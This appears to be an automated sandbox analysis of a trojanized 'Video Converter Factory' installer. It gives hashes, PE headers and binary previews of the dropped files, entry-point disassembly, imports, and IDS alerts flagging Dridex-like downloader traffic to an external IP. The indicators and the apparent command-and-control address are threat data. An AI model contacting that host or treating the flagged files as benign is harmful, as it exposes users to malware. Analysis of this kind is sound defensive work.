                                                                                                    Category:dropped
                                                                                                    Size (bytes):499712
                                                                                                    Entropy (8bit):6.414789978441117
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                                    MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                                    SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                                    SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                                    SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):348160
                                                                                                    Entropy (8bit):6.542655141037356
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                                    MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                                    SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                                    SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                                    SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):645592
                                                                                                    Entropy (8bit):6.50414583238337
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                    MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                    SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                    SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                    SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):717985
                                                                                                    Entropy (8bit):6.514904451312766
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:YTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+XIq5MRxyFb:EPcYn5c/rPx37/zHBA6pFptZ1CEqqMR6
                                                                                                    MD5:119481706F18FC3C5F33B3209D30BD68
                                                                                                    SHA1:BD5C5513F26479A4AA289E7024212CF486D2A040
                                                                                                    SHA-256:F9AFDC7612A9F458055D790F71AD943B9B6AE76193E8AEB0AEC9F671DD486A7B
                                                                                                    SHA-512:54A85A8B3F9BF1117788298FA9C81765B17FF63E7606D0179FBC6DFD99A1BDDB005F417941E12FB7077C72280184C6C21D79DDA80A911AA2620A14D9E482C22E
                                                                                                    Malicious:true
                                                                                                    Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp
                                                                                                    File Type:InnoSetup Log Video Converter Factory, version 0x30, 5040 bytes, 610930\user, "C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4"
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5040
                                                                                                    Entropy (8bit):4.815712979872764
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ageSdWS14382pOOp9H+eOIhILga7ICSss/Lneqjd6sLuDMO4SA:agBdW535pO3HIhILHICSsAneqJ6sLuDm
                                                                                                    MD5:8AE985D4C4837AB9879BB3E1AC2F072B
                                                                                                    SHA1:AA3823E01554756B460BC4278E90D5185CEEDAC4
                                                                                                    SHA-256:8A2F9024C529D60506BCB88D277FCB8302E898E29005DAE45FE969A7BD16F17F
                                                                                                    SHA-512:DD400157B6AAB67C22A121B60AE7774B772599F0D7E77F06ED0D78A060AD3B3C40C935545B15A75C3E4C6CA040BD47F202CD7976F0509CE28D460A2C37291287
                                                                                                    Malicious:false
                                                                                                    Preview:Inno Setup Uninstall Log (b)....................................Video Converter Factory.........................................................................................................Video Converter Factory.........................................................................................................0...........%...............................................................................................................q.(~.........qZj......]....610930.user>C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4...........*.-.%.. ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):717985
                                                                                                    Entropy (8bit):6.514904451312766
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:YTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+XIq5MRxyFb:EPcYn5c/rPx37/zHBA6pFptZ1CEqqMR6
                                                                                                    MD5:119481706F18FC3C5F33B3209D30BD68
                                                                                                    SHA1:BD5C5513F26479A4AA289E7024212CF486D2A040
                                                                                                    SHA-256:F9AFDC7612A9F458055D790F71AD943B9B6AE76193E8AEB0AEC9F671DD486A7B
                                                                                                    SHA-512:54A85A8B3F9BF1117788298FA9C81765B17FF63E7606D0179FBC6DFD99A1BDDB005F417941E12FB7077C72280184C6C21D79DDA80A911AA2620A14D9E482C22E
                                                                                                    Malicious:true
                                                                                                    Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp
                                                                                                    File Type:MS Windows HtmlHelp Data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):78183
                                                                                                    Entropy (8bit):7.692742945771669
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                                    MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                                    SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                                    SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                                    SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                                    Malicious:false
                                                                                                    Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):176128
                                                                                                    Entropy (8bit):6.204917493416147
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                                    MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                                    SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                                    SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                                    SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:modified
                                                                                                    Size (bytes):3099386
                                                                                                    Entropy (8bit):6.385876608035659
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:L+34icZXPo7s74/INmrJbq0U+Oc/0nu4Almy9M9w+7k59oJ1XL:ticdPo7seIgrJbqX+Opnu4AZ9M997k5g
                                                                                                    MD5:044E781B9914BD4A3851BF6BA7D7C9D9
                                                                                                    SHA1:0997A268A8B23DA1EF7410F597588DFF6C4B02FD
                                                                                                    SHA-256:EFA907CC71D1749C10429B43A4CC56C5C48EF7BA6082A4AA58849FFC11081FDF
                                                                                                    SHA-512:442C792FB94047798043B81D7CB49C5882DC04E87C280260C88A5FA1BBE81CACF0E2D33EC80C844C0FC041F08FFAEDDBE74F13A3E7F3F5A122F0942A49588684
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L....._g.............................T............@.........................../.....2-0.....................................D........P..................................................................................p..........................._aett_6............................. ..`_aftt_6.j........0..................@..@_agtt_6..d.......0..................@....rsrc........P......................@..@_ahtt_6..@...`...>..................`.-.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Entropy (8bit):7.998178865399748
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 98.73%
                                                                                                    • Inno Setup installer (109748/4) 1.08%
                                                                                                    • Windows Screen Saver (13104/52) 0.13%
                                                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    File name:Oz2UhFBTHy.exe
                                                                                                    File size:3'918'263 bytes
                                                                                                    MD5:667621f07a3de153960af063462b20fe
                                                                                                    SHA1:d58576525b3020446b244bba68d5cd3b6fef1f15
                                                                                                    SHA256:efec8c0153efdda5a578ec1dd1a08254fc04a4036adda01ab44a4415e02cb852
                                                                                                    SHA512:c6c35343b55d640ae23454675519a22995b3770c20e3ae401e9661812f0996f0ddac52f6c4c2cd491fd863a2382c3f34d6c839d2300679b57a105b106005354c
                                                                                                    SSDEEP:98304:M4qypgtmjZsnhOFmLs2BLlsPznH3MQ7o36yqc:vpAmViQmYoLKrT7o33
                                                                                                    TLSH:3E0633038F1945BDC3A66AF50C18E955EFAFB23149763392718C9FAC8DA753408CE729
                                                                                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                    Icon Hash:2d2e3797b32b2b99
                                                                                                    Entrypoint:0x40a5f8
                                                                                                    Entrypoint Section:CODE
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:1
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:1
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:1
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                                                    Instruction
                                                                                                    push ebp
                                                                                                    mov ebp, esp
                                                                                                    add esp, FFFFFFC4h
                                                                                                    push ebx
                                                                                                    push esi
                                                                                                    push edi
                                                                                                    xor eax, eax
                                                                                                    mov dword ptr [ebp-10h], eax
                                                                                                    mov dword ptr [ebp-24h], eax
                                                                                                    call 00007F5EE47D8EB3h
                                                                                                    call 00007F5EE47DA0BAh
                                                                                                    call 00007F5EE47DA349h
                                                                                                    call 00007F5EE47DA3ECh
                                                                                                    call 00007F5EE47DC38Bh
                                                                                                    call 00007F5EE47DECF6h
                                                                                                    call 00007F5EE47DEE5Dh
                                                                                                    xor eax, eax
                                                                                                    push ebp
                                                                                                    push 0040ACC9h
                                                                                                    push dword ptr fs:[eax]
                                                                                                    mov dword ptr fs:[eax], esp
                                                                                                    xor edx, edx
                                                                                                    push ebp
                                                                                                    push 0040AC92h
                                                                                                    push dword ptr fs:[edx]
                                                                                                    mov dword ptr fs:[edx], esp
                                                                                                    mov eax, dword ptr [0040C014h]
                                                                                                    call 00007F5EE47DF90Bh
                                                                                                    call 00007F5EE47DF4F6h
                                                                                                    cmp byte ptr [0040B234h], 00000000h
                                                                                                    je 00007F5EE47E03EEh
                                                                                                    call 00007F5EE47DFA08h
                                                                                                    xor eax, eax
                                                                                                    call 00007F5EE47D9BA9h
                                                                                                    lea edx, dword ptr [ebp-10h]
                                                                                                    xor eax, eax
                                                                                                    call 00007F5EE47DC99Bh
                                                                                                    mov edx, dword ptr [ebp-10h]
                                                                                                    mov eax, 0040CE28h
                                                                                                    call 00007F5EE47D8F4Ah
                                                                                                    push 00000002h
                                                                                                    push 00000000h
                                                                                                    push 00000001h
                                                                                                    mov ecx, dword ptr [0040CE28h]
                                                                                                    mov dl, 01h
                                                                                                    mov eax, 0040738Ch
                                                                                                    call 00007F5EE47DD22Ah
                                                                                                    mov dword ptr [0040CE2Ch], eax
                                                                                                    xor edx, edx
                                                                                                    push ebp
                                                                                                    push 0040AC4Ah
                                                                                                    push dword ptr fs:[edx]
                                                                                                    mov dword ptr fs:[edx], esp
                                                                                                    call 00007F5EE47DF966h
                                                                                                    mov dword ptr [0040CE34h], eax
                                                                                                    mov eax, dword ptr [0040CE34h]
                                                                                                    cmp dword ptr [eax+0Ch], 00000000h
                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    CODE0x10000x9d300x9e00c3bd95c4b1a8e5199981e0d9b45fd18cFalse0.6052709651898734data6.631765876950794IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    DATA0xb0000x2500x4001ee71d84f1c77af85f1f5c278f880572False0.306640625data2.751820662285145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    BSS0xc0000xe8c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0x100000x8c40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0x110000x2c000x2c0088fc3dc9d7e5f7275baf4deff939d180False0.326171875data4.497167329498401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                                                    RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                                                    RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                                                    RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                                                    RT_STRING0x125740x2f2data0.35543766578249336
                                                                                                    RT_STRING0x128680x30cdata0.3871794871794872
                                                                                                    RT_STRING0x12b740x2cedata0.42618384401114207
                                                                                                    RT_STRING0x12e440x68data0.75
                                                                                                    RT_STRING0x12eac0xb4data0.6277777777777778
                                                                                                    RT_STRING0x12f600xaedata0.5344827586206896
                                                                                                    RT_RCDATA0x130100x2cdata1.2045454545454546
                                                                                                    RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                                                    RT_VERSION0x1307c0x4f4dataEnglishUnited States0.26419558359621453
                                                                                                    RT_MANIFEST0x135700x5a4XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.42590027700831024
                                                                                                    DLLImport
                                                                                                    kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                                                    user32.dllMessageBoxA
                                                                                                    oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                                                    advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                                                    kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                                                    user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                                                    comctl32.dllInitCommonControls
                                                                                                    advapi32.dllAdjustTokenPrivileges
                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                    DutchNetherlands
                                                                                                    EnglishUnited States
                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-12-16T13:43:41.682455+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949837188.119.66.185443TCP
                                                                                                    2024-12-16T13:43:42.371595+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949837188.119.66.185443TCP
                                                                                                    2024-12-16T13:43:47.389022+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949853188.119.66.185443TCP
                                                                                                    2024-12-16T13:43:48.111366+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949853188.119.66.185443TCP
                                                                                                    2024-12-16T13:43:49.697566+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949859188.119.66.185443TCP
                                                                                                    2024-12-16T13:43:50.385851+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949859188.119.66.185443TCP
                                                                                                    2024-12-16T13:43:52.261583+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949866188.119.66.185443TCP
                                                                                                    2024-12-16T13:43:52.952062+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949866188.119.66.185443TCP
                                                                                                    2024-12-16T13:43:54.538964+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949872188.119.66.185443TCP
                                                                                                    2024-12-16T13:43:55.228516+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949872188.119.66.185443TCP
                                                                                                    2024-12-16T13:43:56.816929+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949878188.119.66.185443TCP
                                                                                                    2024-12-16T13:43:57.515018+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949878188.119.66.185443TCP
                                                                                                    2024-12-16T13:43:59.097392+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949884188.119.66.185443TCP
                                                                                                    2024-12-16T13:43:59.804827+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949884188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:01.369551+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949890188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:02.052397+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949890188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:03.811177+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949896188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:04.540880+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949896188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:06.110518+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949902188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:06.799352+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949902188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:08.368016+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949908188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:09.048847+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949908188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:10.808899+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949914188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:11.494103+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949914188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:13.058405+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949921188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:13.743051+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949921188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:15.498260+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949928188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:16.184839+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949928188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:17.758452+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949935188.119.66.185443TCP
